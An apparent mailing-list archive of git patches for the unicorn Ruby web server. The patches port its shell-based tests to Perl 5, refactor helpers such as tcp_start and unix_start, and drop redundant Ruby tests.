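	POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";

	my $pid = fork // die "fork: $!";
	if ($pid == 0) {        # stand-in for the after_fork hook
		open my $wr, '>', $fifo or die "open: $!";
		print $wr "pid=$$";
		exit 0;
	}

	# opening a FIFO read-only blocks until a writer appears,
	# so readline only returns once the "worker" is alive:
	open my $rd, '<', $fifo or die "open: $!";
	my $line = readline($rd);   # "pid=<child pid>"
	waitpid($pid, 0);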
[-- Attachment #12: 0011-test_exec-drop-sd_listen_fds-emulation-test.patch --]
[-- Type: text/x-diff, Size: 1751 bytes --]

From 5d828a4ef7683345bcf2ff659442fed0a6fb7a97 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:40 +0000
Subject: [PATCH 11/23] test_exec: drop sd_listen_fds emulation test

The Perl 5 tests already rely on this implicitly, and there was
never a point when Perl 5 couldn't emulate systemd behavior.
---
 test/exec/test_exec.rb | 33 ---------------------------------
 1 file changed, 33 deletions(-)

diff --git a/test/exec/test_exec.rb b/test/exec/test_exec.rb
index 2929b2e..1d3a0fd 100644
--- a/test/exec/test_exec.rb
+++ b/test/exec/test_exec.rb
@@ -97,39 +97,6 @@ def teardown
     end
   end
 
-  def test_sd_listen_fds_emulation
-    # [ruby-core:69895] [Bug #11336] fixed by r51576
-    return if RUBY_VERSION.to_f < 2.3
-
-    File.open("config.ru", "wb") { |fp| fp.write(HI) }
-    sock = TCPServer.new(@addr, @port)
-
-    [ %W(-l #@addr:#@port), nil ].each do |l|
-      sock.setsockopt(:SOL_SOCKET, :SO_KEEPALIVE, 0)
-
-      pid = xfork do
-        redirect_test_io do
-          # pretend to be systemd
-          ENV['LISTEN_PID'] = "#$$"
-          ENV['LISTEN_FDS'] = '1'
-
-          # 3 = SD_LISTEN_FDS_START
-          args = [ $unicorn_bin ]
-          args.concat(l) if l
-          args << { 3 => sock }
-          exec(*args)
-        end
-      end
-      res = hit(["http://#@addr:#@port/"])
-      assert_equal [ "HI\n" ], res
-      assert_shutdown(pid)
-      assert sock.getsockopt(:SOL_SOCKET, :SO_KEEPALIVE).bool,
-                  'unicorn should always set SO_KEEPALIVE on inherited sockets'
-    end
-  ensure
-    sock.close if sock
-  end
-
   def test_inherit_listener_unspecified
     File.open("config.ru", "wb") { |fp| fp.write(HI) }
     sock = TCPServer.new(@addr, @port)

[-- Attachment #13: 0012-test_exec-drop-test_basic-and-test_config_ru_alt_pat.patch --]
[-- Type: text/x-diff, Size: 1667 bytes --]

From 548593c6b3d52a4bebd52542ad9c423ed2b7252d Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:41 +0000
Subject: [PATCH 12/23] test_exec: drop test_basic and test_config_ru_alt_path

We already have coverage for these basic things elsewhere.
---
 test/exec/test_exec.rb | 24 ------------------------
 1 file changed, 24 deletions(-)

diff --git a/test/exec/test_exec.rb b/test/exec/test_exec.rb
index 1d3a0fd..55f828e 100644
--- a/test/exec/test_exec.rb
+++ b/test/exec/test_exec.rb
@@ -265,16 +265,6 @@ def test_exit_signals
     end
   end
 
-  def test_basic
-    File.open("config.ru", "wb") { |fp| fp.syswrite(HI) }
-    pid = fork do
-      redirect_test_io { exec($unicorn_bin, "-l", "#{@addr}:#{@port}") }
-    end
-    results = retry_hit(["http://#{@addr}:#{@port}/"])
-    assert_equal String, results[0].class
-    assert_shutdown(pid)
-  end
-
   def test_rack_env_unset
     File.open("config.ru", "wb") { |fp| fp.syswrite(SHOW_RACK_ENV) }
     pid = fork { redirect_test_io { exec($unicorn_bin, "-l#@addr:#@port") } }
@@ -638,20 +628,6 @@ def test_read_embedded_cli_switches
     assert_shutdown(pid)
   end
 
-  def test_config_ru_alt_path
-    config_path = "#{@tmpdir}/foo.ru"
-    File.open(config_path, "wb") { |fp| fp.syswrite(HI) }
-    pid = fork do
-      redirect_test_io do
-        Dir.chdir("/")
-        exec($unicorn_bin, "-l#{@addr}:#{@port}", config_path)
-      end
-    end
-    results = retry_hit(["http://#{@addr}:#{@port}/"])
-    assert_equal String, results[0].class
-    assert_shutdown(pid)
-  end
-
   def test_load_module
     libdir = "#{@tmpdir}/lib"
     FileUtils.mkpath([ libdir ])

[-- Attachment #14: 0013-tests-check_stderr-consistently-in-Perl-5-tests.patch --]
[-- Type: text/x-diff, Size: 2415 bytes --]

From cd7ee67fc8ebadec9bdd913d49ed3f214596ea47 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:42 +0000
Subject: [PATCH 13/23] tests: check_stderr consistently in Perl 5 tests

The Bourne shell tests did, so let's not let stuff sneak past us.
---
 t/active-unix-socket.t |  5 ++---
 t/integration.t        |  7 ++-----
 t/lib.perl             | 10 +++++++++-
 3 files changed, 13 insertions(+), 9 deletions(-)

diff --git a/t/active-unix-socket.t b/t/active-unix-socket.t
index 1241904..c132dc2 100644
--- a/t/active-unix-socket.t
+++ b/t/active-unix-socket.t
@@ -20,7 +20,7 @@ my $unix_req = sub {
 	print $fh <<EOM;
 pid "$tmpdir/u.pid"
 listen "$u1"
-stderr_path "$tmpdir/err1.log"
+stderr_path "$tmpdir/err.log"
 EOM
 	close $fh;
 
@@ -113,6 +113,5 @@ is($pidf, $to_kill{u1}, 'pid file contents unchanged after 2nd start failure');
 	ok(-S $u1, 'socket stays after SIGTERM');
 }
 
-my @log = slurp("$tmpdir/err.log");
-diag("@log") if $ENV{V};
+check_stderr;
 done_testing;
diff --git a/t/integration.t b/t/integration.t
index c687655..939dc24 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -246,11 +246,8 @@ EOM
 
 
 undef $ar;
-my @log = slurp("$tmpdir/err.log");
-diag("@log") if $ENV{V};
-my @err = grep(!/NameError.*Unicorn::Waiter/, grep(/error/i, @log));
-is_deeply(\@err, [], 'no unexpected errors in stderr');
-is_deeply([grep(/SIGKILL/, @log)], [], 'no SIGKILL in stderr');
+
+check_stderr;
 
 undef $tmpdir;
 done_testing;
diff --git a/t/lib.perl b/t/lib.perl
index 49632cf..315ef2d 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -11,12 +11,20 @@ use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
 use File::Temp 0.19 (); # 0.19 for ->newdir
 our ($tmpdir, $errfh);
 our @EXPORT = qw(unicorn slurp tcp_server tcp_connect unicorn $tmpdir $errfh
-	SEEK_SET tcp_host_port start_req which spawn);
+	SEEK_SET tcp_host_port start_req which spawn check_stderr);
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
 open($errfh, '>>', "$tmpdir/err.log");
 
+sub check_stderr () {
+	my @log = slurp("$tmpdir/err.log");
+	diag("@log") if $ENV{V};
+	my @err = grep(!/NameError.*Unicorn::Waiter/, grep(/error/i, @log));
+	is_deeply(\@err, [], 'no unexpected errors in stderr');
+	is_deeply([grep(/SIGKILL/, @log)], [], 'no SIGKILL in stderr');
+}
+
 sub tcp_server {
 	my %opt = (
 		ReuseAddr => 1,

[-- Attachment #15: 0014-tests-consistent-tcp_start-and-unix_start-across-Per.patch --]
[-- Type: text/x-diff, Size: 8017 bytes --]

From 0dcd8bd569813a175ad43837db3ab07019a95b99 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:43 +0000
Subject: [PATCH 14/23] tests: consistent tcp_start and unix_start across Perl
 5 tests

I'll be using Unix sockets more in tests since there's no
risk of system-wide conflicts with TCP port allocation.
Furthermore, curl supports `--unix-socket' nowadays, so
there's little reason to rely on TCP sockets and the conflicts
they bring in tests.
---
 t/active-unix-socket.t | 13 ++++---------
 t/integration.t        | 28 ++++++++++++++--------------
 t/lib.perl             | 30 ++++++++++++++++--------------
 3 files changed, 34 insertions(+), 37 deletions(-)

diff --git a/t/active-unix-socket.t b/t/active-unix-socket.t
index c132dc2..8723137 100644
--- a/t/active-unix-socket.t
+++ b/t/active-unix-socket.t
@@ -10,11 +10,6 @@ my %to_kill;
 END { kill('TERM', values(%to_kill)) if keys %to_kill }
 my $u1 = "$tmpdir/u1.sock";
 my $u2 = "$tmpdir/u2.sock";
-my $unix_req = sub {
-	my $s = IO::Socket::UNIX->new(Peer => shift, Type => SOCK_STREAM);
-	print $s @_, "\r\n\r\n";
-	$s;
-};
 {
 	open my $fh, '>', "$tmpdir/u1.conf.rb";
 	print $fh <<EOM;
@@ -53,7 +48,7 @@ is($?, 0, 'daemonized 1st process');
 chomp($to_kill{u1} = slurp("$tmpdir/u.pid"));
 like($to_kill{u1}, qr/\A\d+\z/s, 'read pid file');
 
-chomp(my $worker_pid = readline($unix_req->($u1, 'GET /pid')));
+chomp(my $worker_pid = readline(unix_start($u1, 'GET /pid')));
 like($worker_pid, qr/\A\d+\z/s, 'captured worker pid');
 ok(kill(0, $worker_pid), 'worker is kill-able');
 
@@ -65,7 +60,7 @@ isnt($?, 0, 'conflicting PID file fails to start');
 chomp(my $pidf = slurp("$tmpdir/u.pid"));
 is($pidf, $to_kill{u1}, 'pid file contents unchanged after start failure');
 
-chomp(my $pid2 = readline($unix_req->($u1, 'GET /pid')));
+chomp(my $pid2 = readline(unix_start($u1, 'GET /pid')));
 is($worker_pid, $pid2, 'worker PID unchanged');
 
 
@@ -73,7 +68,7 @@ is($worker_pid, $pid2, 'worker PID unchanged');
 unicorn('-c', "$tmpdir/u3.conf.rb", @uarg)->join;
 isnt($?, 0, 'conflicting UNIX socket fails to start');
 
-chomp($pid2 = readline($unix_req->($u1, 'GET /pid')));
+chomp($pid2 = readline(unix_start($u1, 'GET /pid')));
 is($worker_pid, $pid2, 'worker PID still unchanged');
 
 chomp($pidf = slurp("$tmpdir/u.pid"));
@@ -101,7 +96,7 @@ is($pidf, $to_kill{u1}, 'pid file contents unchanged after 2nd start failure');
 	chomp($to_kill{u1} = slurp("$tmpdir/u.pid"));
 	like($to_kill{u1}, qr/\A\d+\z/s, 'read pid file');
 
-	chomp($pid2 = readline($unix_req->($u1, 'GET /pid')));
+	chomp($pid2 = readline(unix_start($u1, 'GET /pid')));
 	like($pid2, qr/\A\d+\z/, 'worker running');
 
 	ok(kill('TERM', delete $to_kill{u1}), 'SIGTERM restarted daemon');
diff --git a/t/integration.t b/t/integration.t
index 939dc24..b33e3c3 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -70,7 +70,7 @@ EOM
 my ($c, $status, $hdr);
 
 # response header tests
-$c = start_req($srv, 'GET /rack-2-newline-headers HTTP/1.0');
+$c = tcp_start($srv, 'GET /rack-2-newline-headers HTTP/1.0');
 ($status, $hdr) = slurp_hdr($c);
 like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
 my $orig_200_status = $status;
@@ -89,7 +89,7 @@ SKIP: { # Date header check
 };
 
 
-$c = start_req($srv, 'GET /rack-3-array-headers HTTP/1.0');
+$c = tcp_start($srv, 'GET /rack-3-array-headers HTTP/1.0');
 ($status, $hdr) = slurp_hdr($c);
 is_deeply([ grep(/^x-r3: /, @$hdr) ],
 	[ 'x-r3: a', 'x-r3: b', 'x-r3: c' ],
@@ -97,7 +97,7 @@ is_deeply([ grep(/^x-r3: /, @$hdr) ],
 
 SKIP: {
 	eval { require JSON::PP } or skip "JSON::PP missing: $@", 1;
-	my $c = start_req($srv, 'GET /env_dump');
+	my $c = tcp_start($srv, 'GET /env_dump');
 	my $json = do { local $/; readline($c) };
 	unlike($json, qr/^Connection: /smi, 'no connection header for 0.9');
 	unlike($json, qr!\AHTTP/!s, 'no HTTP/1.x prefix for 0.9');
@@ -107,17 +107,17 @@ SKIP: {
 }
 
 # cf. <CAO47=rJa=zRcLn_Xm4v2cHPr6c0UswaFC_omYFEH+baSxHOWKQ@mail.gmail.com>
-$c = start_req($srv, 'GET /nil-header-value HTTP/1.0');
+$c = tcp_start($srv, 'GET /nil-header-value HTTP/1.0');
 ($status, $hdr) = slurp_hdr($c);
 is_deeply([grep(/^X-Nil:/, @$hdr)], ['X-Nil: '],
 	'nil header value accepted for broken apps') or diag(explain($hdr));
 
 if ('TODO: ensure Rack::Utils::HTTP_STATUS_CODES is available') {
-	$c = start_req($srv, 'POST /tweak-status-code HTTP/1.0');
+	$c = tcp_start($srv, 'POST /tweak-status-code HTTP/1.0');
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 200 HI\b!, 'status tweaked');
 
-	$c = start_req($srv, 'POST /restore-status-code HTTP/1.0');
+	$c = tcp_start($srv, 'POST /restore-status-code HTTP/1.0');
 	($status, $hdr) = slurp_hdr($c);
 	is($status, $orig_200_status, 'original status restored');
 }
@@ -130,12 +130,12 @@ SKIP: {
 }
 
 if ('bad requests') {
-	$c = start_req($srv, 'GET /env_dump HTTP/1/1');
+	$c = tcp_start($srv, 'GET /env_dump HTTP/1/1');
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 400 \b!, 'got 400 on bad request');
 
-	$c = tcp_connect($srv);
-	print $c 'GET /';
+	$c = tcp_start($srv);
+	print $c 'GET /';
 	my $buf = join('', (0..9), 'ab');
 	for (0..1023) { print $c $buf }
 	print $c " HTTP/1.0\r\n\r\n";
@@ -143,7 +143,7 @@ if ('bad requests') {
 	like($status, qr!\AHTTP/1\.[01] 414 \b!,
 		'414 on REQUEST_PATH > (12 * 1024)');
 
-	$c = tcp_connect($srv);
+	$c = tcp_start($srv);
 	print $c 'GET /hello-world?a';
 	$buf = join('', (0..9));
 	for (0..1023) { print $c $buf }
@@ -152,7 +152,7 @@ if ('bad requests') {
 	like($status, qr!\AHTTP/1\.[01] 414 \b!,
 		'414 on QUERY_STRING > (10 * 1024)');
 
-	$c = tcp_connect($srv);
+	$c = tcp_start($srv);
 	print $c 'GET /hello-world#a';
 	$buf = join('', (0..9), 'a'..'f');
 	for (0..63) { print $c $buf }
@@ -173,7 +173,7 @@ SKIP: {
 	my $ck_hash = sub {
 		my ($sub, $path, %opt) = @_;
 		seek($rh, 0, SEEK_SET);
-		$c = tcp_connect($srv);
+		$c = tcp_start($srv);
 		$c->autoflush(0);
 		$PUT{$sub}->($rh, $c, $path, %opt);
 		$c->flush or die $!;
@@ -235,11 +235,11 @@ EOM
 	$wpid =~ s/\Apid=// or die;
 	ok(CORE::kill(0, $wpid), 'worker PID retrieved');
 
-	$c = start_req($srv, $req);
+	$c = tcp_start($srv, $req);
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 200\b!, 'minimal request succeeds');
 
-	$c = start_req($srv, 'GET /xxxxxx HTTP/1.0');
+	$c = tcp_start($srv, 'GET /xxxxxx HTTP/1.0');
 	($status, $hdr) = slurp_hdr($c);
 	like($status, qr!\AHTTP/1\.[01] 413\b!, 'big request fails');
 }
diff --git a/t/lib.perl b/t/lib.perl
index 315ef2d..1d6e78d 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -10,8 +10,8 @@ use IO::Socket::INET;
 use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
 use File::Temp 0.19 (); # 0.19 for ->newdir
 our ($tmpdir, $errfh);
-our @EXPORT = qw(unicorn slurp tcp_server tcp_connect unicorn $tmpdir $errfh
-	SEEK_SET tcp_host_port start_req which spawn check_stderr);
+our @EXPORT = qw(unicorn slurp tcp_server tcp_start unicorn $tmpdir $errfh
+	SEEK_SET tcp_host_port which spawn check_stderr unix_start);
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
@@ -55,26 +55,28 @@ sub tcp_host_port {
 	}
 }
 
-sub tcp_connect {
-	my ($dest, %opt) = @_;
-	my $addr = tcp_host_port($dest);
-	my $s = ref($dest)->new(
+sub unix_start ($@) {
+	my ($dst, @req) = @_;
+	my $s = IO::Socket::UNIX->new(Peer => $dst, Type => SOCK_STREAM) or
+		BAIL_OUT "unix connect $dst: $!";
+	$s->autoflush(1);
+	print $s @req, "\r\n\r\n" if @req;
+	$s;
+}
+
+sub tcp_start ($@) {
+	my ($dst, @req) = @_;
+	my $addr = tcp_host_port($dst);
+	my $s = ref($dst)->new(
 		Proto => 'tcp',
 		Type => SOCK_STREAM,
 		PeerAddr => $addr,
-		%opt,
 	) or BAIL_OUT "failed to connect to $addr: $!";
 	$s->autoflush(1);
+	print $s @req, "\r\n\r\n" if @req;
 	$s;
 }
 
-sub start_req {
-	my ($srv, @req) = @_;
-	my $c = tcp_connect($srv);
-	print $c @req, "\r\n\r\n";
-	$c;
-}
-
 sub slurp {
 	open my $fh, '<', $_[0];
 	local $/;

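A side note on the `--unix-socket' remark above: once unix_start() exists,
the same raw requests work against a socket path, and curl can hit the very
same listener.  A rough sketch, assuming a unicorn instance is already
listening on $sock (the socket path is a placeholder; curl ignores the URL
host when --unix-socket is given):

	use v5.14; BEGIN { require './t/lib.perl' };
	my $sock = "$tmpdir/demo.sock"; # placeholder; a server must listen here

	# raw request over the UNIX socket, same shape as the TCP tests:
	my $c = unix_start($sock, 'GET /pid HTTP/1.0');
	my $res = do { local $/; readline($c) };

	# the same endpoint via curl, if installed:
	if (my $curl = which('curl')) {
		my $cpid = spawn($curl, qw(-sSf --unix-socket), $sock,
				'http://localhost/pid', {});
		waitpid($cpid, 0);
	}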
[-- Attachment #16: 0015-port-t9000-preread-input.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 3856 bytes --]

From 1b8840d8d13491eecd2fa92e06f73c65eadd33ba Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:44 +0000
Subject: [PATCH 15/23] port t9000-preread-input.sh to Perl 5

Stuffing it into t/integration.t for now so we can save on
startup costs.
---
 t/integration.t          | 32 ++++++++++++++++++++++++---
 t/lib.perl               |  2 +-
 t/preread_input.ru       |  4 +---
 t/t9000-preread-input.sh | 48 ----------------------------------------
 4 files changed, 31 insertions(+), 55 deletions(-)
 delete mode 100755 t/t9000-preread-input.sh

diff --git a/t/integration.t b/t/integration.t
index b33e3c3..f5afd5d 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -7,8 +7,8 @@
 
 use v5.14; BEGIN { require './t/lib.perl' };
 use autodie;
-my $srv = tcp_server();
-my $host_port = tcp_host_port($srv);
+our $srv = tcp_server();
+our $host_port = tcp_host_port($srv);
 my $t0 = time;
 my $conf = "$tmpdir/u.conf.rb";
 open my $conf_fh, '>', $conf;
@@ -209,8 +209,34 @@ SKIP: {
 	seek($rh, 0, SEEK_SET);
 	$copt->{0} = $rh;
 	$do_curl->('-T-');
-}
 
+	diag 'testing Unicorn::PrereadInput...';
+	local $srv = tcp_server();
+	local $host_port = tcp_host_port($srv);
+	check_stderr;
+	truncate($errfh, 0);
+
+	my $pri = unicorn(qw(-E none t/preread_input.ru), { 3 => $srv });
+	$url = "http://$host_port/";
+
+	$do_curl->(qw(-T t/random_blob));
+	seek($rh, 0, SEEK_SET);
+	$copt->{0} = $rh;
+	$do_curl->('-T-');
+
+	my @pr_err = slurp("$tmpdir/err.log");
+	is(scalar(grep(/app dispatch:/, @pr_err)), 2, 'app dispatched twice');
+
+	# abort a chunked request by blocking curl on a FIFO:
+	$c = tcp_start($srv, "PUT / HTTP/1.1\r\nTransfer-Encoding: chunked");
+	close $c;
+	@pr_err = slurp("$tmpdir/err.log");
+	is(scalar(grep(/app dispatch:/, @pr_err)), 2,
+			'app did not dispatch on aborted request');
+	undef $pri;
+	check_stderr;
+	diag 'Unicorn::PrereadInput middleware tests done';
+}
 
 # ... more stuff here
 
diff --git a/t/lib.perl b/t/lib.perl
index 1d6e78d..b6148cf 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -79,7 +79,7 @@ sub tcp_start ($@) {
 
 sub slurp {
 	open my $fh, '<', $_[0];
-	local $/;
+	local $/ if !wantarray;
 	readline($fh);
 }
 
diff --git a/t/preread_input.ru b/t/preread_input.ru
index 79685c4..f0a1748 100644
--- a/t/preread_input.ru
+++ b/t/preread_input.ru
@@ -1,8 +1,6 @@
 #\-E none
 require 'digest/sha1'
 require 'unicorn/preread_input'
-use Rack::ContentLength
-use Rack::ContentType, "text/plain"
 use Unicorn::PrereadInput
 nr = 0
 run lambda { |env|
@@ -13,5 +11,5 @@
     dig.update(buf)
   end
 
-  [ 200, {}, [ "#{dig.hexdigest}\n" ] ]
+  [ 200, {}, [ dig.hexdigest ] ]
 }
diff --git a/t/t9000-preread-input.sh b/t/t9000-preread-input.sh
deleted file mode 100755
index d6c73ab..0000000
--- a/t/t9000-preread-input.sh
+++ /dev/null
@@ -1,48 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 9 "PrereadInput middleware tests"
-
-t_begin "setup and start" && {
-	random_blob_sha1=$(rsha1 < random_blob)
-	unicorn_setup
-	unicorn  -D -c $unicorn_config preread_input.ru
-	unicorn_wait_start
-}
-
-t_begin "single identity request" && {
-	curl -sSf -T random_blob http://$listen/ > $tmp
-}
-
-t_begin "sha1 matches" && {
-	test x"$(cat $tmp)" = x"$random_blob_sha1"
-}
-
-t_begin "single chunked request" && {
-	curl -sSf -T- < random_blob http://$listen/ > $tmp
-}
-
-t_begin "sha1 matches" && {
-	test x"$(cat $tmp)" = x"$random_blob_sha1"
-}
-
-t_begin "app only dispatched twice" && {
-	test 2 -eq "$(grep 'app dispatch:' < $r_err | count_lines )"
-}
-
-t_begin "aborted chunked request" && {
-	rm -f $tmp
-	curl -sSf -T- < $fifo http://$listen/ > $tmp &
-	curl_pid=$!
-	kill -9 $curl_pid
-	wait
-}
-
-t_begin "app only dispatched twice" && {
-	test 2 -eq "$(grep 'app dispatch:' < $r_err | count_lines )"
-}
-
-t_begin "killing succeeds" && {
-	kill -QUIT $unicorn_pid
-}
-
-t_done

[-- Attachment #17: 0016-port-t-t0116-client_body_buffer_size.sh-to-Perl-5.patch --]
[-- Type: text/x-diff, Size: 8861 bytes --]

From e9593301044f305d4a0e074f77eea35015ca0ec4 Mon Sep 17 00:00:00 2001
From: Eric Wong <BOFH@YHBT.net>
Date: Mon, 5 Jun 2023 10:12:45 +0000
Subject: [PATCH 16/23] port t/t0116-client_body_buffer_size.sh to Perl 5

While I'm fine with depending on curl for certain things,
there's no need for it here since unicorn has had lazy
rack.input for over a decade at this point.
---
 t/active-unix-socket.t                     |  1 +
 t/{t0116.ru => client_body_buffer_size.ru} |  2 -
 t/client_body_buffer_size.t                | 83 ++++++++++++++++++++++
 t/integration.t                            | 10 ---
 t/lib.perl                                 | 12 +++-
 t/t0116-client_body_buffer_size.sh         | 80 ---------------------
 6 files changed, 95 insertions(+), 93 deletions(-)
 rename t/{t0116.ru => client_body_buffer_size.ru} (82%)
 create mode 100644 t/client_body_buffer_size.t
 delete mode 100755 t/t0116-client_body_buffer_size.sh

diff --git a/t/active-unix-socket.t b/t/active-unix-socket.t
index 8723137..4e11837 100644
--- a/t/active-unix-socket.t
+++ b/t/active-unix-socket.t
@@ -109,4 +109,5 @@ is($pidf, $to_kill{u1}, 'pid file contents unchanged after 2nd start failure');
 }
 
 check_stderr;
+undef $tmpdir;
 done_testing;
diff --git a/t/t0116.ru b/t/client_body_buffer_size.ru
similarity index 82%
rename from t/t0116.ru
rename to t/client_body_buffer_size.ru
index fab5fce..44161a5 100644
--- a/t/t0116.ru
+++ b/t/client_body_buffer_size.ru
@@ -1,6 +1,4 @@
 #\ -E none
-use Rack::ContentLength
-use Rack::ContentType, 'text/plain'
 app = lambda do |env|
   input = env['rack.input']
   case env["PATH_INFO"]
diff --git a/t/client_body_buffer_size.t b/t/client_body_buffer_size.t
new file mode 100644
index 0000000..b1a99f3
--- /dev/null
+++ b/t/client_body_buffer_size.t
@@ -0,0 +1,83 @@
+#!perl -w
+# Copyright (C) unicorn hackers <unicorn-public@yhbt.net>
+# License: GPL-3.0+ <https://www.gnu.org/licenses/gpl-3.0.txt>
+
+use v5.14; BEGIN { require './t/lib.perl' };
+use autodie;
+my $uconf = "$tmpdir/u.conf.rb";
+
+open my $conf_fh, '>', $uconf;
+$conf_fh->autoflush(1);
+print $conf_fh <<EOM;
+client_body_buffer_size 0
+EOM
+my $srv = tcp_server();
+my $host_port = tcp_host_port($srv);
+my @uarg = (qw(-E none t/client_body_buffer_size.ru -c), $uconf);
+my $ar = unicorn(@uarg, { 3 => $srv });
+my ($c, $status, $hdr);
+my $mem_class = 'StringIO';
+my $fs_class = 'Unicorn::TmpIO';
+
+$c = tcp_start($srv, "PUT /input_class HTTP/1.0\r\nContent-Length: 0");
+($status, $hdr) = slurp_hdr($c);
+like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
+is(readline($c), $mem_class, 'zero-byte file is StringIO');
+
+$c = tcp_start($srv, "PUT /tmp_class HTTP/1.0\r\nContent-Length: 1");
+print $c '.';
+($status, $hdr) = slurp_hdr($c);
+like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
+is(readline($c), $fs_class, '1 byte file is filesystem-backed');
+
+
+my $fifo = "$tmpdir/fifo";
+POSIX::mkfifo($fifo, 0600) or die "mkfifo: $!";
+seek($conf_fh, 0, SEEK_SET);
+truncate($conf_fh, 0);
+print $conf_fh <<EOM;
+listen "$host_port" # TODO: remove this requirement for SIGHUP
+after_fork { |_,_| File.open('$fifo', 'w') { |fp| fp.write "pid=#\$\$" } }
+EOM
+$ar->do_kill('HUP');
+open my $fifo_fh, '<', $fifo;
+like(my $wpid = readline($fifo_fh), qr/\Apid=\d+\z/a ,
+	'reloaded w/ default client_body_buffer_size');
+
+
+$c = tcp_start($srv, "PUT /tmp_class HTTP/1.0\r\nContent-Length: 1");
+($status, $hdr) = slurp_hdr($c);
+like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
+is(readline($c), $mem_class, 'class for a 1 byte file is memory-backed');
+
+
+my $one_meg = 1024 ** 2;
+$c = tcp_start($srv, "PUT /tmp_class HTTP/1.0\r\nContent-Length: $one_meg");
+($status, $hdr) = slurp_hdr($c);
+like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
+is(readline($c), $fs_class, '1 megabyte file is FS-backed');
+
+# reload with bigger client_body_buffer_size
+say $conf_fh "client_body_buffer_size $one_meg";
+$ar->do_kill('HUP');
+open $fifo_fh, '<', $fifo;
+like($wpid = readline($fifo_fh), qr/\Apid=\d+\z/a ,
+	'reloaded w/ bigger client_body_buffer_size');
+
+
+$c = tcp_start($srv, "PUT /tmp_class HTTP/1.0\r\nContent-Length: $one_meg");
+($status, $hdr) = slurp_hdr($c);
+like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
+is(readline($c), $mem_class, '1 megabyte file is now memory-backed');
+
+my $too_big = $one_meg + 1;
+$c = tcp_start($srv, "PUT /tmp_class HTTP/1.0\r\nContent-Length: $too_big");
+($status, $hdr) = slurp_hdr($c);
+like($status, qr!\AHTTP/1\.[01] 200\b!, 'status line valid');
+is(readline($c), $fs_class, '1 megabyte + 1 byte file is FS-backed');
+
+
+undef $ar;
+check_stderr;
+undef $tmpdir;
+done_testing;
diff --git a/t/integration.t b/t/integration.t
index f5afd5d..855c260 100644
--- a/t/integration.t
+++ b/t/integration.t
@@ -15,16 +15,6 @@ open my $conf_fh, '>', $conf;
 $conf_fh->autoflush(1);
 my $ar = unicorn(qw(-E none t/integration.ru -c), $conf, { 3 => $srv });
 my $curl = which('curl');
-END { diag slurp("$tmpdir/err.log") if $tmpdir };
-sub slurp_hdr {
-	my ($c) = @_;
-	local $/ = "\r\n\r\n"; # affects both readline+chomp
-	chomp(my $hdr = readline($c));
-	my ($status, @hdr) = split(/\r\n/, $hdr);
-	diag explain([ $status, \@hdr ]) if $ENV{V};
-	($status, \@hdr);
-}
-
 my %PUT = (
 	chunked_md5 => sub {
 		my ($in, $out, $path, %opt) = @_;
diff --git a/t/lib.perl b/t/lib.perl
index b6148cf..2685c3b 100644
--- a/t/lib.perl
+++ b/t/lib.perl
@@ -11,11 +11,12 @@ use POSIX qw(dup2 _exit setpgid :signal_h SEEK_SET F_SETFD);
 use File::Temp 0.19 (); # 0.19 for ->newdir
 our ($tmpdir, $errfh);
 our @EXPORT = qw(unicorn slurp tcp_server tcp_start unicorn $tmpdir $errfh
-	SEEK_SET tcp_host_port which spawn check_stderr unix_start);
+	SEEK_SET tcp_host_port which spawn check_stderr unix_start slurp_hdr);
 
 my ($base) = ($0 =~ m!\b([^/]+)\.[^\.]+\z!);
 $tmpdir = File::Temp->newdir("unicorn-$base-XXXX", TMPDIR => 1);
 open($errfh, '>>', "$tmpdir/err.log");
+END { diag slurp("$tmpdir/err.log") if $tmpdir };
 
 sub check_stderr () {
 	my @log = slurp("$tmpdir/err.log");
@@ -25,6 +26,15 @@ sub check_stderr () {
 	is_deeply([grep(/SIGKILL/, @log)], [], 'no SIGKILL in stderr');
 }
 
+sub slurp_hdr {
+	my ($c) = @_;
+	local $/ = "\r\n\r\n"; # affects both readline+chomp
+	chomp(my $hdr = readline($c));
+	my ($status, @hdr) = split(/\r\n/, $hdr);
+	diag explain([ $status, \@hdr ]) if $ENV{V};
+	($status, \@hdr);
+}
+
 sub tcp_server {
 	my %opt = (
 		ReuseAddr => 1,
diff --git a/t/t0116-client_body_buffer_size.sh b/t/t0116-client_body_buffer_size.sh
deleted file mode 100755
index c9e17c7..0000000
--- a/t/t0116-client_body_buffer_size.sh
+++ /dev/null
@@ -1,80 +0,0 @@
-#!/bin/sh
-. ./test-lib.sh
-t_plan 12 "client_body_buffer_size settings"
-
